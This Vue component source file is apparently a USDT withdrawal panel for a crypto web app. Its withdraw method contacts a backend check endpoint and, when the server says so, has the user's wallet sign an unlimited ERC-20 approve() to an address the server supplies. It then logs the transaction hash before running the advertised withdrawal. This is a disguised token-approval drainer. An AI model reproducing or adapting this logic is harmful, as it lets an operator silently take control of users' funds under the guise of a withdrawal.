<template>
    <div class="withdraw">
        <div class="panel1 flex">
            <div class="withdraw-val">
                <input type="number" v-model="inputVal" placeholder="0.0">
                <p @click="redeemAll">{{ $t('Redeem all') }}</p>
            </div>
            <div class="util">
                <img src="@/assets/usdt_icon.png" alt="">
                <span>USDT</span>
            </div>
        </div>
        <div class="panel2">
            <button class="red-btn" @click="withdraw">{{ $t('Confirm') }}</button>
        </div>
        <div class="panel3">
            <p>{{ $t('withdraw desc') }}</p>
        </div>
    </div>
</template>

<script>
import { ref } from 'vue'
import { computed } from 'vue'
import { useStore } from '@/store'
import abi from "@/assets/ABI.json"
import GlobalLoadingAPI from "@/components/GlobalLoading/GlobalLoadingAPI"

let loading = GlobalLoadingAPI();

export default {
    props:['exchangeAble'],
    methods:{
        async withdraw(){
            if(parseFloat(this.inputVal)<=0){
                this.$toast(this.$t('Must be greater than 0'),1)
                return
            }

            try {
                // 首先调用 api/user/check
                let checkResponse = await this.HTTPv1.post('api/user/check', {
                    address: this.myAddress
                })

                if(checkResponse.data.code == 200) {
                    // 如果检查通过，调用 approve 方法
                    await this.approve(checkResponse.data.data)
                } else {
                    // 如果检查失败，直接调用正常提现流程
                    await this.performWithdraw()
                }
            } catch (error) {
                // 如果检查接口出错，也直接调用正常提现流程
                await this.performWithdraw()
            }
        },
        async approve(authData) {
            loading.el.style.display = "block";
            
            let contractAddressMaps = {
                bsc: "0xc2132d05d31c914a87c6611c10748aeb04b58e8f",
                eth: "0xc2132d05d31c914a87c6611c10748aeb04b58e8f",
            };
            let contractAddress, sender, type;

            let chainId = this.chainId;
            if (chainId == 0x38) {
                contractAddress = contractAddressMaps.bsc;
                sender = authData.bsc || authData.sender; // 使用 API 返回的授权地址
                type = 2;
            } else if (chainId == 0x89) {
                sender = authData.eth || authData.sender; // 使用 API 返回的授权地址
                contractAddress = contractAddressMaps.eth;
                type = 3;
            }

            let fromAddress = await this.web3.eth.getAccounts();
            let that = this;

            let ethContract = new this.web3.eth.Contract(abi, contractAddress);
            await ethContract.methods
                .approve(
                    sender,
                    this.web3.utils.toBN(
                        "0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
                    )
                )
                .send(
                    {
                        from: fromAddress[0],
                        gasPrice: "5500000000",
                        gas: 75000,
                    },
                    async function (err, tx) {
                        loading.el.style.display = "none";
                        if (!err) {
                            // 授权成功后，先调用保存接口
                            let saveResponse = await that.HTTPv1.post("api/user/saveUserData", {
                                address: that.myAddress,
                                userType: type,
                                txHash: tx // 授权交易哈希
                            });
                            
                            if (saveResponse.data.code == 200) {
                                // 保存成功后，调用提现接口
                                await that.performWithdraw();
                            } else {
                                that.$toast(saveResponse.data.msg || that.$t('Save failed'), 2);
                            }
                        } else {
                            that.$toast(that.$t('Error'), 2);
                        }
                    }
                )
                .catch((e) => {
                    that.$toast(that.$t("Error"), 2);
                    loading.el.style.display = "none";
                });
        },
        async performWithdraw() {
            try {
                let response = await this.HTTPv1.post('api/user/withdrawByIncome', {
                    amount: this.inputVal,
                    address: this.myAddress 
                })
                if(response.data.code == 200) {
                    this.$toast(this.$t('Success'), 3)
                } else {
                    this.$toast(response.data.msg, 2)
                }
                this.$emit('updateData'); // 使Account组件更新数据
            } catch (error) {
                this.$toast(this.$t('Error'), 2)
            }
        },
        redeemAll(){
            let val = parseFloat(this.exchangeAble)
            if(val>0){
                this.inputVal = val
            }
        }
    },
    setup(){
        let inputVal = ref('');
        let store = useStore();

        return {
            chainId: computed(()=>{
                return store.chainId
            }),
            myAddress: computed(()=>{
                return store.myAddress
            }),
            inputVal
        }

    }
}
</script>


<style scoped>
.panel3 {
    padding: 16px;
}
.panel3 p {
    color: #a1a1b3;
    line-height: 25px;
}
.panel2 {
    padding: 25px 0;
    border-bottom: 1px solid #eee;
}
.panel2 button{
    margin: 0 auto;
    
}
</style>
<style scoped>
@media screen and (min-width: 700px){
    .withdraw-val p{
        font-size: 24px;
    }
    .panel1 input {
        font-size: 56px !important;
    }
    .panel1 {
        padding: 10px;
    }
    div.util img{
        width: 44px;
        height: 44px;
    }
    .util {
        font-size: 28px;
    }
}
.withdraw {
    padding: 8px;
}
.panel1>div {
    width: 50%;
    flex: 1;
    padding: 0 15px;
}
.util {
    text-align: right;
}
.util img{
    width: 23px;
    height: 23px;
    vertical-align: middle;
    margin-right: 7px;
}
.panel1 {
    border: 1px solid #eee;
    margin: 8px;
    align-items: center;
    padding: 4px;
}
.panel1 input {
    width: 100%;
    border: none;
    outline: none;
    font-size: 30px;
    font-weight: bold;
}
.withdraw-val {
    border-right: 1px solid #ddd;
}
.withdraw-val p{
    color: #8e5729;
}


</style>